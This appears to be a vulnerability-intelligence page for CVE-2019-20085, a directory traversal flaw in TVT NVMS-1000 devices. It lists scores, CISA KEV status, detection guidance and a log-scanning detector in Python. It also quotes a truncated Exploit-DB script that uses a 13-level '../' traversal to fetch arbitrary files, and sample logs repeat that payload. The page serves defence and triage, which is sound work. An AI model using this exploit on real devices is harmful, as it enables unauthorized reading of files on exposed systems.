CVE-2019-20085
published 2019-12-30
CVE-2019-20085: TVT NVMS-1000 devices allow GET /.. Directory Traversal
Priority P189 · high · 7.5 (CVSS 3.1)
CISA Known Exploited Vulnerability · due 2022-05-03
Exploited in the wild
EPSS: 96.07% (99.9th percentile)
TVT NVMS-1000 devices allow GET /.. Directory Traversal
Detection & IOCs (extracted from sources)
- Detect directory traversal attempts by matching URL-encoded traversal sequences in GET requests targeting NVMS-1000 devices (port 80). Look for patterns like '..%2F' repeated in the request path.
- Also detect unencoded traversal sequences in GET requests: repeated '../' segments (13 levels deep) followed by a target filename path.
- The vulnerability is unauthenticated and requires no prior access. The exploit targets NVMS-1000 version 3.4.1 specifically, but version information may not always be available for scoping detections.
- This vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog, indicating active in-the-wild exploitation. Prioritize detection and patching accordingly.
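The two detection patterns above can be covered by one check. This is an added example, not part of any rule or source indexed on this page. It goes beyond the fixed 13-level pattern by decoding the request target and flagging any GET whose path climbs above the web root. It assumes access logs in common/combined format from a proxy or front end in front of the device; the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Request line inside a common/combined-format access log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?"')

def decode_fully(target, max_rounds=3):
    """Percent-decode repeatedly so '..%2F' and '..%252F' both become '../'."""
    for _ in range(max_rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target

def escape_depth(target):
    """Return how many levels the path climbs above the web root (0 = stays inside)."""
    path = decode_fully(target.split("?", 1)[0]).replace("\\", "/")
    depth, lowest = 0, 0
    for segment in path.split("/"):
        if segment in ("", "."):
            continue
        depth += -1 if segment == ".." else 1
        lowest = min(lowest, depth)
    return -lowest

def flag_traversal(log_lines):
    """Yield (client_ip, levels_above_root, raw_target) for GETs that leave the root."""
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m or m.group("method") != "GET":
            continue
        levels = escape_depth(m.group("target"))
        if levels > 0:
            yield line.split(" ", 1)[0], levels, m.group("target")

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:00:00:01 +0000] "GET /index.html HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:00:00:02 +0000] "GET /' + "../" * 13 + 'windows/win.ini HTTP/1.1" 200 92',
    '198.51.100.7 - - [01/Jan/2024:00:00:03 +0000] "GET /' + "..%2F" * 13 + 'windows%2Fwin.ini HTTP/1.1" 200 92',
    '192.0.2.10 - - [01/Jan/2024:00:00:04 +0000] "GET /css/../img/logo.png HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for hit in flag_traversal(SAMPLE_LOG):
        print(hit)
```

A 200 response on a flagged request is the case to triage first, since it suggests the file was actually served.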
CVSS provenance
nvd · v3.1 · 7.5 · HIGH · CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvd · v2.0 · 5.0 · MEDIUM · AV:N/AC:L/Au:N/C:P/I:N/A:N
vulncheck · 7.5 · HIGH
cisa · 7.5 · HIGH
CISA
TVT NVMS-1000 Directory Traversal Vulnerability
cisa·2021-11-03·CVSS 7.5
CVE-2019-20085 [HIGH] CWE-22 TVT NVMS-1000 Directory Traversal Vulnerability
Vulnerability: TVT NVMS-1000 Directory Traversal Vulnerability
Affected: TVT NVMS-1000
TVT devices utilizing NVMS-1000 software contain a directory traversal vulnerability via GET /.. requests.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2019-20085
Remediation Due Date: 2022-05-03
GHSA
GHSA-6mf3-7mpr-9mgf: TVT NVMS-1000 devices allow GET /
ghsa_unreviewed·2022-05-24
CVE-2019-20085 [MEDIUM] CWE-22 GHSA-6mf3-7mpr-9mgf: TVT NVMS-1000 devices allow GET /
TVT NVMS-1000 devices allow GET /.. Directory Traversal
VulnCheck
TVT NVMS-1000 Directory Traversal Vulnerability
vulncheck·2019·CVSS 7.5
CVE-2019-20085 [HIGH] CWE-22 TVT NVMS-1000 Directory Traversal Vulnerability
TVT NVMS-1000 Directory Traversal Vulnerability
TVT devices utilizing NVMS-1000 software contain a directory traversal vulnerability via GET /.. requests.
Affected: TVT NVMS-1000
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json
Exploit PoC: https://vulncheck.com/xdb/7e163b7e9b71; https://vulncheck.com/xdb/48cf542ed3af; https://vulncheck.com/xdb/b69ae39519f9
Remediation Due: 2022-05-03
No detection rules found.
Exploit-DB
TVT NVMS 1000 - Directory Traversal
exploitdb·2020-04-13·CVSS 7.5
CVE-2019-20085 [HIGH] TVT NVMS 1000 - Directory Traversal
TVT NVMS 1000 - Directory Traversal
---
# Exploit Title: TVT NVMS 1000 - Directory Traversal
# Date: 2020-04-13
# Exploit Author: Mohin Paramasivam (Shad0wQu35t)
# Vendor Homepage: http://en.tvt.net.cn/
# Version : N/A
# Software Link : http://en.tvt.net.cn/products/188.html
# Original Author : Numan Türle
# CVE : CVE-2019-20085
import sys
import requests
import os
import time
if len(sys.argv) !=4:
    print " "
    print "Usage : python exploit.py url filename outputname"
    print "Example : python exploit.py http://10.10.10.10/ windows/win.ini win.ini"
    print " "
else:
    traversal = "../../../../../../../../../../../../../"
    filename = sys.argv[2]
    url = sys.argv[1]+traversal+filename
    outputname = sys.argv[3]
    content = requests.get(url)
    if content.status_code == 200:
        print " "
        print "Directory T
Metasploit
TVT NVMS-1000 Directory Traversal
metasploit
TVT NVMS-1000 Directory Traversal
TVT NVMS-1000 Directory Traversal
This module exploits an unauthenticated directory traversal vulnerability which exists in TVT network surveillance management software-1000 version 3.4.1. NVMS listens by default on port 80.
Nuclei
TVT NVMS 1000 - Local File Inclusion
nuclei·CVSS 7.5
CVE-2019-20085 [HIGH] TVT NVMS 1000 - Local File Inclusion
TVT NVMS 1000 - Local File Inclusion
TVT NVMS-1000 devices allow GET /.. local file inclusion attacks.
Template:
id: CVE-2019-20085
info:
  name: TVT NVMS 1000 - Local File Inclusion
  author: daffainfo
  severity: high
  description: |
    TVT NVMS-1000 devices allow GET /.. local file inclusion attacks.
  impact: |
    An attacker can exploit this vulnerability to gain unauthorized access to sensitive information stored on the system.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the local file inclusion vulnerability in TVT NVMS 1000 software.
  reference:
    - https://www.exploit-db.com/exploits/48311
    - https://www.exploit-db.com/exploits/47774
    - http://packetstormsecurity.com/files/157196/TVT-NVMS-1000-Directory-Traversal.html
    - https://nvd.nist.gov/vuln/detai
No writeups or analysis indexed.
http://packetstormsecurity.com/files/157196/TVT-NVMS-1000-Directory-Traversal.html
https://www.exploit-db.com/exploits/47774
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2019-20085
2019-12-30: Published
2021-11-03: Added to CISA KEV
Exploited in the wild